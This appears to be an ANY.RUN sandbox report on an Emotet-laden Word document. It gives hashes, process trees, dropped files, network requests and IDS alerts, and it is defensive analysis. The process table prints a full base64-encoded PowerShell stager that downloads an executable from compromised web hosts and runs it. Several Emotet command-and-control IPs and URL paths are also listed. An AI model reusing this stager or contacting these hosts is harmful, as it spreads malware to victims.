File name: | 05405b2849704c3c08635a49e5aaf300.zip |
Full analysis: | https://app.any.run/tasks/0db3fdda-af6a-45b1-94d7-4a6f000e9a26 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 19:28:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | D34E3DEC887DFF199A62EEBDB34EB7E8 |
SHA1: | 42368F44F2515EFA600BE51904333247B3D589A5 |
SHA256: | 22D8B447A0150C9880F615972909242D48E3AF410CD4F3D59406EC06F1C91CD2 |
SSDEEP: | 1536:EC94Div0CjvctqlzrvNgDk8d3YFHKm1HYyYxRo3WE5nLK4YeIXTrwGd9H:H4DgRvc0lHvyD1m14vRomE51dIPZh |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 05405b2849704c3c08635a49e5aaf300 |
---|---|
ZipUncompressedSize: | 148224 |
ZipCompressedSize: | 90416 |
ZipCRC: | 0x3e61f894 |
ZipModifyDate: | 2019:05:15 20:47:02 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2320 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\05405b2849704c3c08635a49e5aaf300.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2812 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\05405b2849704c3c08635a49e5aaf300.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
4044 | powershell -enc JABiADYANgAzADAAMQA9ACcARABfADMANQA3ADEAOQA2ACcAOwAkAFYAOQA2ADAAMgAzADUANQAgAD0AIAAnADIANgA3ACcAOwAkAGwANQAzADcAMwBfAD0AJwBjADkAMwA2ADQAMwA4ADMAJwA7ACQAVAA1ADcANgA5ADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFYAOQA2ADAAMgAzADUANQArACcALgBlAHgAZQAnADsAJABIADcANwA3AF8AOAAwAD0AJwBIADYAMQA4AF8AOQAxADEAJwA7ACQAcQBfADYANwA5ADUAOAA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBgAGUAVAAuAGAAVwBFAEIAYwBsAGkAZQBuAHQAOwAkAHYAMwAyAF8ANAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBlAGwAZQBtAGUAbQBvAHIAeQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AOQB5ADgAMAAwADIANAAvAEAAaAB0AHQAcAA6AC8ALwBhAGsAdABwAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHoAdgAxAHgAOQAwAC8AQABoAHQAdABwADoALwAvAHIAaQBzAGkAbgBnAGkAbgBkAGkAYQBuAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBsADIALwBAAGgAdAB0AHAAOgAvAC8AZgBpAGYAaQBkAG8AcwBzAGEAbAB0AG8AcwBhAGwAdABvAHMALgBjAG8AbQAvAHkAZgBwAG8ALwB1AGYAagBlAGkAeAAwADcALwBAAGgAdAB0AHAAOgAvAC8AdwBlAGEAcgB0AGUAeABoAGkAYgBpAHQAaQBvAG4AcwAuAGMAbwBtAC8AZQBxAHAAbABzAGoALwBiADEAdgAzAHoAMQAwAC8AJwAuAFMAUABMAEkAVAAoACcAQAAnACkAOwAkAHYANAA0AF8AMgA1AD0AJwBZAF8AMwBfADkANwAwADIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoANgAwADgAMQBfADkAIABpAG4AIAAkAHYAMwAyAF8ANAAyADQAOAApAHsAdAByAHkAewAkAHEAXwA2ADcAOQA1ADgALgBEAG8AVwBOAEwATwBhAEQAZgBpAEwAZQAoACQAegA2ADAAOAAxAF8AOQAsACAAJABUADUANwA2ADkAOQApADsAJABJADUANwA5ADcAXwA5ADYAPQAnAFAAOAAzADIAOQBfACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAVAA1ADcANgA5ADkAKQAuAGwARQBuAEcAdABIACAALQBnAGUAIAAyADQANQAxADkAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAVAA1ADcANgA5ADkAOwAkAGgANgAyADAAMAA0ADgAOAA9ACcAWQA5ADAAOAA0AF8ANgA5ACcAOwBiAHIAZQBhAGsAOwAkAFAAMgA3AF8AXwA2ADkAOQA9ACcAcwA1ADYAMwA1ADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAbAA1ADAANAA3ADkAMQA9ACcAegAwADMANAAzADEANwAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3920 | "C:\Users\admin\267.exe" | C:\Users\admin\267.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3176 | --b640ad31 | C:\Users\admin\267.exe | 267.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3600 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 267.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2944 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2788 | "C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE" -x -s 1572 | C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Application Error Reporting Exit code: 0 Version: 14.0.6015.1000 | ||||
3904 | C:\Windows\system32\dwwin.exe -x -s 1572 | C:\Windows\system32\dwwin.exe | — | DW20.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Client Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3148 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\05405b2849704c3c08635a49e5aaf300.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2320 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2320.5450\05405b2849704c3c08635a49e5aaf300 | — | |
MD5:— | SHA256:— | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC1EC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AM2VDKZ1I896JZO7NKNR.temp | — | |
MD5:— | SHA256:— | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\05405b2849704c3c08635a49e5aaf300.doc.LNK | lnk | |
MD5:274D6021AAB2BCE7DD2E62DC2376434A | SHA256:7216D4BE39DEA9E9665FDD8B9B50531F8EF1D7199B8B26824076146DEBC325DC | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF0C73E8.wmf | wmf | |
MD5:9457E8100D612BB847E26C443FC3328C | SHA256:2C70AF2DAF1DF34161499443FA3F97F772B74CD265E15C667596E80F8424AB8E | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:B38D142A4B4AFA6844BB3570EDACF351 | SHA256:6A4E7F40FC279D40BA90C0603FBAB6CC34BA7820DD4A73AA352F81A9AF1F144D | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BB94A36.wmf | wmf | |
MD5:2963B6A70C9E0994FB6E2262E3F8E60B | SHA256:7DFB2B1D85B85462DD2F6A9973E4DC125954EC0732CB95A0D251B8C105847133 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C60A8FE2.wmf | wmf | |
MD5:FAE739451A82C5CE35C53A276CB87C96 | SHA256:F16705F4ACA2570E336B951083133236C56ED69FF3B1087F8DEF9AFBABCAC491 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E3969A2BD64726422BD6254194905024 | SHA256:2B43D4A15C0C9311B076D312193C2D460BFDD77BBF0F41E05909FEF4A3197142 | |||
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4044 | powershell.exe | GET | 200 | 173.236.56.186:80 | http://elememory.com/wp-admin/9y80024/ | US | executable | 121 Kb | suspicious |
2944 | soundser.exe | POST | — | 200.32.61.210:8080 | http://200.32.61.210:8080/schema/tpt/ringin/merge/ | AR | — | — | malicious |
2944 | soundser.exe | POST | — | 31.179.135.186:80 | http://31.179.135.186/xian/ | PL | — | — | malicious |
2944 | soundser.exe | POST | — | 189.143.52.49:443 | http://189.143.52.49:443/acquire/loadan/ | MX | — | — | malicious |
2560 | powershell.exe | GET | 200 | 173.236.56.186:80 | http://elememory.com/wp-admin/9y80024/ | US | executable | 121 Kb | suspicious |
2944 | soundser.exe | POST | — | 181.15.177.100:443 | http://181.15.177.100:443/srvc/bml/ringin/merge/ | AR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2944 | soundser.exe | 31.179.135.186:80 | — | Liberty Global Operations B.V. | PL | malicious |
2944 | soundser.exe | 200.32.61.210:8080 | — | Telefonica de Argentina | AR | malicious |
2944 | soundser.exe | 189.143.52.49:443 | — | Uninet S.A. de C.V. | MX | malicious |
2560 | powershell.exe | 173.236.56.186:80 | elememory.com | SingleHop, Inc. | US | suspicious |
2944 | soundser.exe | 181.15.177.100:443 | — | Telecom Argentina S.A. | AR | malicious |
4044 | powershell.exe | 173.236.56.186:80 | elememory.com | SingleHop, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
elememory.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
4044 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4044 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4044 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2944 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 6 |
2944 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2944 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2944 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2944 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2944 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2944 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |